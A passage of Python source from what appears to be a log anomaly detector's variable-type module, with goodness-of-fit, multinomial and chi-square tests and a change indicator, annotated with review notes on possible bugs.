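    Which quantiles are generated depends on the variable type stored in
    self.var_type[event_index][var_index]:

    * 'emp'   - 2 * num_s_gof_values almost equidistant order statistics of the last
                num_init observed values.
    * 'spec'  - the standardised quantiles self.quantiles['spec'] rescaled with the
                expected value (index 1) and sigma (index 2) of the type entry.
    * 'betam' - the standardised quantiles self.quantiles['betam1'] / ['betam2'], split
                by the proportion (index 5), rescaled with min (index 1) and scale (index 2).

    Any other variable type leaves self.distr_val untouched.
    NOTE(review): self.quantiles is not defined in this view; the index arithmetic assumes
    each of its arrays has exactly 1000 entries - confirm where it is built.
    """
    var_type = self.var_type[event_index][var_index]
    num_quantiles = 2 * self.num_s_gof_values

    if var_type[0] == 'emp':
        # Almost equidistant positions inside the last num_init values (all < num_init).
        positions = [int(self.num_init * j / num_quantiles) for j in range(num_quantiles)]
        # Copy before sorting so the detector's value history keeps its order.
        ordered = copy.copy(self.event_type_detector.values[event_index][var_index][-self.num_init:])
        ordered.sort()
        self.distr_val[event_index][var_index] = [ordered[pos] for pos in positions]
        return

    if var_type[0] == 'spec':
        ev = var_type[1]
        sigma = var_type[2]
        # Map num_quantiles points onto the 1000 standardised quantiles (0 .. 999).
        indices = np.array(range(num_quantiles)) / (num_quantiles - 1) * (1000 - 1)
        indices = indices.astype(int)
        self.distr_val[event_index][var_index] = self.quantiles['spec'][indices] * sigma + ev
        return

    if var_type[0] == 'betam':
        min_val = var_type[1]
        scale = var_type[2]
        proportion = var_type[5]
        # Indices taken from the first beta component, the remaining ones from the second.
        indices1 = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))]
        taken = set(indices1)  # set membership keeps the complement linear instead of quadratic
        indices2 = [i for i in range(1000) if i not in taken]
        mixed = np.append(
            self.quantiles['betam1'][indices1] * scale + min_val,
            self.quantiles['betam2'][indices2] * scale + min_val)
        # Sort in place so the stored reference sample is monotone for the gof-test.
        mixed.sort()
        self.distr_val[event_index][var_index] = mixed
        return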
def s_gof_test(self, event_index, var_index, first_distr):
    """Make a gof-test.

    Compares the newest num_s_gof_values observed values of the variable against the
    distribution stored in self.var_type[event_index][var_index], using either a
    KS-test (self.used_gof_test == 'KS') or a Cramer-von-Mises test (any other value,
    commented below as 'CM').

    @param event_index index of the event type.
    @param var_index index of the variable inside the event type.
    @param first_distr if True the second entry of the result is the raw test statistic,
           otherwise it is 1.0 on failure and 0.0 on success.
    @return a list with the first entry True/False and as the second entry the maximal value of the step functions

    NOTE(review): kstest, ks_2samp, cramervonmises and cramervonmises2 are not defined in this
    view. cramervonmises2 is not a scipy name, and the results are compared with crit_value as
    plain numbers, so both are presumably project helpers returning a scalar - confirm.
    NOTE(review): for a 'beta' type whose sub-type (index 5) is not 1..5, test_statistic stays 0
    and the test passes without any comparison; the 'uni'/'beta' distance checks in the CM
    branch return an int 1 where the other paths return 1.0.
    """
    num_distr_val = 2 * self.num_s_gof_values
    if self.used_gof_test == 'KS':
        # Calculate the critical value for the KS-test
        # The parameters are in the list of the critical values
        distribution = self.var_type[event_index][var_index][0]
        if distribution == 'beta':
            distribution += str(self.var_type[event_index][var_index][-1])
        # Use the tabulated critical value when one exists for (alpha, num_init, num_s_gof_values, distribution) ...
        if self.s_gof_alpha in self.crit_val_upd_ks and self.num_init in self.crit_val_upd_ks[self.s_gof_alpha] \
                and self.num_s_gof_values in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init] \
                and distribution in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values]:
            crit_value = \
                self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]
        else:
            # ... otherwise fall back to the asymptotic two-sample KS critical value.
            crit_value = ((num_distr_val + self.num_s_gof_values) * (np.log(2 / self.s_gof_alpha)) / (
                2 * num_distr_val * self.num_s_gof_values)) ** (1 / 2)
        test_statistic = 0
        # Scipy KS-test for uniformal distribution
        if self.var_type[event_index][var_index][0] == 'uni':
            test_statistic = kstest(
                self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'uniform',
                args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]-self.var_type[event_index][
                    var_index][1]))[0]
        # Scipy KS-test for normal distribution
        elif self.var_type[event_index][var_index][0] == 'nor':
            test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'norm', args=(
                self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))[0]
        # Scipy KS-test for beta distributions
        elif self.var_type[event_index][var_index][0] == 'beta':
            if self.var_type[event_index][var_index][5] == 1:
                # Sub-type 1: symmetric beta(0.5, 0.5) on [index 3, index 4]
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                    0.5, 0.5, self.var_type[event_index][var_index][3], self.var_type[event_index][var_index][4] - self.var_type[
                        event_index][var_index][3]))[0]
            elif self.var_type[event_index][var_index][5] == 2:
                # Mu and sigma of the desired distribution
                # (beta(5, 2) standardised; location/scale derived from the stored ev (index 1) and sigma (index 2))
                [mu, sigma] = [5 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)]
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                    5, 2, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                    self.var_type[event_index][var_index][2] / sigma))[0]
            elif self.var_type[event_index][var_index][5] == 3:
                # Mu and sigma of the desired distribution (beta(2, 5), mirror image of sub-type 2)
                [mu, sigma] = [2 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)]
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                    2, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                    self.var_type[event_index][var_index][2] / sigma))[0]
            elif self.var_type[event_index][var_index][5] == 4:
                # Mu and sigma of the desired distribution (beta(1, 5))
                [mu, sigma] = [1 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)]
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                    1, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                    self.var_type[event_index][var_index][2] / sigma))[0]
            elif self.var_type[event_index][var_index][5] == 5:
                # Mu and sigma of the desired distribution (beta(5, 1), mirror image of sub-type 4)
                [mu, sigma] = [5 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)]
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                    5, 1, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                    self.var_type[event_index][var_index][2] / sigma))[0]
        else:
            # Remaining types ('emp', 'spec', 'betam'): two-sample test against the quantile list
            # prepared by s_gof_get_quantiles.
            test_statistic = ks_2samp(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][var_index][
                -self.num_s_gof_values:])[0]
        if first_distr:
            if test_statistic > crit_value:
                return [False, test_statistic]
            return [True, test_statistic]
        if test_statistic > crit_value:
            return [False, 1.0]
        return [True, 0.0]

    # Else self.used_gof_test == 'CM'
    # Calculate the critical value for the CM-test
    # The parameters are in the list of the critical values
    distribution = self.var_type[event_index][var_index][0]
    if distribution == 'beta':
        distribution += str(self.var_type[event_index][var_index][-1])
    # beta2/beta3 and beta4/beta5 are mirror images and share one tabulated critical value.
    if distribution in ['uni', 'nor', 'beta1']:
        crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]
    elif distribution in ['beta2', 'beta3']:
        crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']
    elif distribution in ['beta4', 'beta5']:
        crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4']
    else:
        # Two-sample (homogeneity) critical value, keyed by the larger and smaller sample size.
        crit_value = self.crit_val_hom_cm[self.s_gof_alpha][max(self.num_init, self.num_s_gof_values)][
            min(self.num_init, self.num_s_gof_values)]
    test_statistic = 0
    # Two sample CM-test for uniformal distribution
    if self.var_type[event_index][var_index][0] == 'uni':
        min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
        max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
        # Widen the observed [min, max] by the configured modifiers to estimate the support of the new sample.
        min_upd = min_val - self.min_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val)
        max_upd = max_val + self.max_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val)
        # Check if the estimated min and max differ more than the critical distance and return a negative test result
        # NOTE(review): divides by the stored range (index 2 - index 1); a degenerate stored range raises ZeroDivisionError.
        if abs(self.var_type[event_index][var_index][1] - min_upd) / (
                self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) +\
                abs(self.var_type[event_index][var_index][2] - max_upd) / (
                self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) >\
                self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]:
            return [False, 1]
        estimated_min = min(self.var_type[event_index][var_index][1], min_upd)
        estimated_max = max(self.var_type[event_index][var_index][2], max_upd)
        # Rescale the sample to [0, 1] and test against the standard uniform distribution.
        test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                         estimated_min) / (estimated_max - estimated_min), 'uniform')
    # Two sample CM-test for normal distribution
    elif self.var_type[event_index][var_index][0] == 'nor':
        test_statistic = cramervonmises(np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]),
                                        'norm', args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))
    # Two sample CM-test for beta distributions
    elif self.var_type[event_index][var_index][0] == 'beta':
        if self.var_type[event_index][var_index][5] == 1:
            # Sub-type 1: support is [index 3, index 4]; same widen-and-compare scheme as 'uni'.
            min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            min_upd = min_val - self.min_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val)
            max_upd = max_val + self.max_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val)
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                    abs(self.var_type[event_index][var_index][4] - max_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]:
                return [False, 1]
            estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
            estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_min) / (estimated_max - estimated_min), 'beta', args=(0.5, 0.5))
        elif self.var_type[event_index][var_index][5] == 2:
            min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            min_upd = min_val - self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
            max_upd = max_val + self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                    abs(self.var_type[event_index][var_index][4] - max_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']:
                return [False, 1]
            estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
            estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_min) / (estimated_max - estimated_min), 'beta', args=(5, 2))
        elif self.var_type[event_index][var_index][5] == 3:
            # Sub-type 3 mirrors sub-type 2, so the min/max modifiers are swapped.
            min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            min_upd = min_val - self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
            max_upd = max_val + self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                    abs(self.var_type[event_index][var_index][4] - max_upd) / (
                    self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']:
                return [False, 1]
            estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
            estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_min) / (estimated_max - estimated_min), 'beta', args=(2, 5))
        elif self.var_type[event_index][var_index][5] == 4:
            # Sub-type 4: only the lower bound (index 3) is known; the expected value (index 1) is
            # updated as a weighted mean of the stored one and the new sample.
            ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean(
                self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (
                self.num_init + self.num_s_gof_values)
            estimated_min = min(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]),
                                self.var_type[event_index][var_index][3])
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            # NOTE(review): the ratio test divides by ev_upd and by the stored ev; an ev of 0 raises ZeroDivisionError.
            if (abs(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                    self.var_type[event_index][var_index][3]) >
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or (
                    max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) >
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]):
                return [False, 1]
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_min) / (ev_upd-estimated_min) * (1 / (5 + 1)-self.min_mod_upd_beta4) +
                                            self.min_mod_upd_beta4, 'beta', args=(1, 5))
        elif self.var_type[event_index][var_index][5] == 5:
            # Sub-type 5 mirrors sub-type 4: only the upper bound (index 4) is known.
            ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean(
                self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (
                self.num_init + self.num_s_gof_values)
            estimated_max = max(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]),
                                self.var_type[event_index][var_index][4])
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            if (abs(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                    self.var_type[event_index][var_index][4]) >
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or (
                    max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) >
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]):
                return [False, 1]
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_max) / (estimated_max - ev_upd) * (1 / (5 + 1)-self.min_mod_upd_beta4) + 1 -
                                            self.min_mod_upd_beta4, 'beta', args=(5, 1))
    else:
        # Remaining types ('emp', 'spec', 'betam'): two-sample test against the quantile list
        # prepared by s_gof_get_quantiles.
        test_statistic = cramervonmises2(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][
            var_index][-self.num_s_gof_values:])
    if first_distr:
        if test_statistic > crit_value:
            return [False, test_statistic]
        return [True, test_statistic]
    if test_statistic > crit_value:
        return [False, 1.0]
    return [True, 0.0]
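def d_test(self, event_index, var_index):
    """Test whether the newest num_update values of a discrete variable still follow its
    learned distribution and shift the result into the binomial-test (BT) history.

    The history self.bt_results[event_index][var_index][0] is a fixed-length list; the oldest
    entry is dropped and 1 (passed) or 0 (failed) is appended. Nothing is returned.

    The type entry self.var_type[event_index][var_index] must be a discrete type whose
    index 1 holds the known values and index 2 their probabilities. The test is selected by
    self.used_multinomial_test:

    * 'MT'     - exact multinomial test using the scipy multinomial object that d_init_bt
                 stored at bt_results[..][1].
    * 'Chi'    - chi-square test against the expected counts.
    * 'Approx' - per-value two-sided binomial limits stored by d_init_bt at
                 bt_results[..][1] (lower) and [..][2] (upper).

    Any other setting leaves the BT history untouched.

    Every value in the tested window must already be in the known-value list, otherwise the
    list.index lookup raises ValueError; the caller is expected to run this only when no new
    values have appeared.
    """
    known_values = self.var_type[event_index][var_index][1]
    bt_entry = self.bt_results[event_index][var_index]

    def count_appearances():
        # Occurrences of each known value among the newest num_update observed values.
        counts = [0] * len(known_values)
        for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]:
            counts[known_values.index(v)] += 1
        return counts

    def record(passed):
        # Drop the oldest BT result and append the newest one (1 = passed, 0 = failed).
        bt_entry[0] = bt_entry[0][1:] + [passed]

    def sum_less_likely_outcomes(pmf, prob_of_sample):
        # Sum of the probabilities of all outcomes that are at most as likely as the observed
        # sample. The enumeration is written out for 2..5 known values. For more than five
        # values the sum stays 0 and the test always fails; a single known value reaches the
        # innermost loop with 5-entry outcomes - presumably never the case, TODO confirm.
        total = 0
        num_known = len(known_values)
        if num_known <= 5:
            for a in range(self.num_update + 1):
                if num_known == 2:
                    tmp_prob = pmf([a, self.num_update - a])
                    if tmp_prob <= prob_of_sample:
                        total += tmp_prob
                    continue
                for b in range(self.num_update - a + 1):
                    if num_known == 3:
                        tmp_prob = pmf([a, b, self.num_update - (a + b)])
                        if tmp_prob <= prob_of_sample:
                            total += tmp_prob
                        continue
                    for c in range(self.num_update - (a + b) + 1):
                        if num_known == 4:
                            tmp_prob = pmf([a, b, c, self.num_update - (a + b + c)])
                            if tmp_prob <= prob_of_sample:
                                total += tmp_prob
                            continue
                        for d in range(self.num_update - (a + b + c) + 1):
                            tmp_prob = pmf([a, b, c, d, self.num_update - (a + b + c + d)])
                            if tmp_prob <= prob_of_sample:
                                total += tmp_prob
        return total

    if self.used_multinomial_test == 'MT':
        values_app = count_appearances()
        pmf = bt_entry[1].pmf
        prob_of_sample = pmf(values_app)
        # Cost grows with num_update ** (number of known values - 1); num_update is configuration.
        smaller_prob_sum = sum_less_likely_outcomes(pmf, prob_of_sample)
        record(0 if smaller_prob_sum < self.d_alpha else 1)
        return

    if self.used_multinomial_test == 'Chi':
        values_app = count_appearances()
        expected = [i * self.num_update for i in self.var_type[event_index][var_index][2]]
        # chisquare(...)[1] is the p-value of the test.
        record(0 if chisquare(values_app, f_exp=expected)[1] < self.d_alpha else 1)
        return

    if self.used_multinomial_test == 'Approx':
        values_app = count_appearances()
        lower_limits = bt_entry[1]
        upper_limits = bt_entry[2]
        # One two-sided BT per value; a single violated limit fails the whole d-test.
        for i, value in enumerate(values_app):
            if value < lower_limits[i] or value > upper_limits[i]:
                record(0)
                return
        record(1)
        return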
def init_var_type_history_list(self, event_index):
    """Initialize the history of the variabletypes of the eventType.

    Creates self.var_type_history_list[event_index] (one entry per variable of the event
    type) if it does not exist yet or is empty, then appends the first history step for
    every tracked variable. Each variable's history is a list with one slot per entry of
    self.var_type_history_list_order:
    [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions]
    where the plain slots hold a 0/1 per step and the list-valued slots hold one sub-list
    per stored quantity. Nothing is returned.

    NOTE(review): the slot layout above is taken from the literal built below and from the
    comments in the original; the meaning of the individual slots beyond that is not
    visible here.
    """
    if len(self.var_type_history_list) < event_index + 1 or self.var_type_history_list[event_index] == []:
        # Pad the outer list so event_index is addressable.
        for _ in range(event_index + 1 - len(self.var_type_history_list)):
            self.var_type_history_list.append([])
        # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions]
        if not self.var_type_history_list[event_index]:
            self.var_type_history_list[event_index] = [[[], [], [[], []], [], [], [], [[], []], [[], []]] for _ in range(len(
                self.var_type[event_index]))]
        # Append the first entries to the history list
        # Without a target_path_list every variable of the event type is tracked ...
        if self.target_path_list is None:
            index_list = range(self.length[event_index])
        # ... otherwise only the variables whose paths were mapped into variable_path_num.
        else:
            index_list = self.variable_path_num[event_index]
        for var_index in index_list:
            # This section updates the history list of the variable types
            if self.var_type[event_index][var_index][0] in self.var_type_history_list_order:
                # Index of the variable type in the list
                # [others, static, [discrete, number of appended steps],
                # asc, desc, unique, range, ev of continuous distributions]
                type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0])
            else:
                # Every type not listed explicitly is treated as continuously distributed.
                type_index = self.var_type_history_list_order.index('cont')
            for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]):
                if tmp_type_index == type_index:
                    # This slot matches the current type: record a 1 (or the distribution parameters).
                    if self.var_type_history_list_order[type_index] == 'cont':
                        for _, val in enumerate(tmp_type_val):
                            val.append(0)
                        # Continuously distributed variable type.
                        if self.var_type[event_index][var_index][0] == 'uni':
                            # Store mean and standard deviation of the uniform distribution on [index 1, index 2].
                            tmp_type_val[0][-1] = (
                                self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2
                            tmp_type_val[1][-1] = (
                                self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12)
                        else:
                            # Other continuous types already keep ev (index 1) and sd (index 2) in the type entry.
                            tmp_type_val[0][-1] = self.var_type[event_index][var_index][1]
                            tmp_type_val[1][-1] = self.var_type[event_index][var_index][2]
                    elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list):
                        # List-valued slot (discrete / range): first sub-list marks the hit, the others get a 0.
                        tmp_type_val[0].append(1)
                        for _, val in enumerate(tmp_type_val, start=1):
                            val.append(0)
                    else:
                        tmp_type_val.append(1)
                else:
                    # Slot of a different type: append a 0 to every sub-list (or the plain list).
                    if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list):
                        for _, val in enumerate(tmp_type_val):
                            val.append(0)
                    else:
                        tmp_type_val.append(0)
def get_indicator(self, event_index):
    """Calculate and returns a indicator for a change in the system behaviour based on the analysis of VTD.

    For every variable of the event type the last num_var_type_considered_ind history steps in
    self.var_type_history_list[event_index] are compared with the reference in
    self.var_type_history_list_reference[event_index]; the per-type positive differences are
    summed into one indicator per variable.

    @param event_index index of the event type.
    @return list with one indicator value per variable; variables whose tracking was switched
            off in event_type_detector.check_variables get 0.

    NOTE(review): the reference list layout mirrors the history list layout; the formulas below
    are reproduced from the original and are documented only as far as they are visible here.
    NOTE(review): the 'cont' branch divides by max(abs(ref ev), abs(current ev)); if both are 0
    this raises ZeroDivisionError.
    """
    # List which stores the single indicators for the variables
    indicator_list = []
    for var_index, var_val in enumerate(self.var_type_history_list[event_index]):
        if not self.event_type_detector.check_variables[event_index][var_index]:
            indicator_list.append(0)
            continue
        # List, which stores the differences of probabilities of the types, where the current history is higher than the reference.
        diff_list = []
        # Length of the reference
        len_ref = self.num_var_type_hist_ref
        # Length of the current historylist
        len_cur = self.num_var_type_considered_ind
        # Appends the positive differnces of the probabilities to diff_list
        for type_index, type_val in enumerate(var_val):
            # Slot 1 is the 'static' slot: a reference that was static throughout but is no
            # longer static in the current window counts as a full change (indicator 1).
            if self.var_type_history_list_reference[event_index][var_index][1] == len_ref and sum(var_val[1]) < len_cur:
                diff_list.append(1)
                break
            # Differentiation of the entries, which are lists (e.g. discrete, range, continuously distributed)
            # Index 2 is the discrete slot of the history layout.
            if type_index in [2, self.var_type_history_list_order.index('range'), self.var_type_history_list_order.index('cont')]:
                if type_index == self.var_type_history_list_order.index('cont'):
                    # Continuously distributed variable type
                    if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0:
                        # Reference was never continuous: fraction of current steps that are.
                        diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                    else:
                        # Mean of the non-zero ev / sd entries in the current window.
                        var_type_ev = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][
                            -self.num_var_type_considered_ind:] if x != 0]), 1)
                        var_type_sd = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][
                            -self.num_var_type_considered_ind:] if x != 0]), 1)
                        # Formula to include the impact of the mean, standard deviation and changes of the distribution
                        if max(self.var_type_history_list_reference[event_index][var_index][type_index][1], var_type_sd) > 0:
                            diff_list.append((min(1, abs((self.var_type_history_list_reference[event_index][var_index][
                                type_index][0] - var_type_ev) / max(abs(self.var_type_history_list_reference[event_index][var_index][
                                    type_index][0]), abs(var_type_ev))) / 3 + abs((self.var_type_history_list_reference[event_index][
                                        var_index][type_index][1] - var_type_sd) / max(abs(self.var_type_history_list_reference[
                                            event_index][var_index][type_index][1]), abs(var_type_sd))) / 3 + 1 / 3) * len([
                                                x for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0])) / len_cur)
                        else:
                            diff_list.append(0)
                elif type_index == self.var_type_history_list_order.index('range'):
                    # range type
                    if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0:
                        diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                    else:
                        # Calculate the lower and upper limits
                        lower_limit_cur = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][
                            -self.num_var_type_considered_ind:] if x != 0]), 1)
                        upper_limit_cur = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][
                            -self.num_var_type_considered_ind:] if x != 0]), 1)
                        lower_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][0]
                        upper_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][1]
                        # Check if the current history contains at least one range type
                        if lower_limit_cur != upper_limit_cur:
                            # Check if the two intervalls intercept
                            if (upper_limit_ref > lower_limit_cur) and (upper_limit_cur > lower_limit_ref):
                                # Share of the current interval lying outside the reference interval,
                                # weighted by the fraction of range steps in the window.
                                diff_list.append(
                                    (max(0, lower_limit_ref - lower_limit_cur) + max(0, upper_limit_cur - upper_limit_ref)) / (max(
                                        upper_limit_cur, upper_limit_ref) - min(lower_limit_cur, lower_limit_ref)) * len([
                                            1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                            else:
                                # Disjoint intervals: every range step counts as changed.
                                diff_list.append(len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                        else:
                            diff_list.append(0)
                else:
                    # Discrete slot: largest positive difference over its sub-lists.
                    tmp_max = 0
                    for j, val in enumerate(type_val):
                        if j == 0 and self.var_type_history_list_reference[event_index][var_index][type_index][j] == 0:
                            # Discrete type new in the current window: full weight.
                            tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur -
                                                    self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref))
                        else:
                            tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur -
                                                    self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref) / 2)
                    diff_list.append(tmp_max)
            else:
                # Plain 0/1 slots (others, static, asc, desc, unique).
                if self.var_type_history_list_reference[event_index][var_index][type_index] == 0:
                    diff_list.append(sum(type_val[-self.num_var_type_considered_ind:]) / len_cur)
                else:
                    diff_list.append(max(0, (sum(type_val[-self.num_var_type_considered_ind:]) / len_cur -
                                             self.var_type_history_list_reference[event_index][var_index][type_index] / len_ref)) / 2)
        if len(diff_list) == 0:
            indicator_list.append(0)
        else:
            indicator_list.append(sum(diff_list))
    return indicator_list
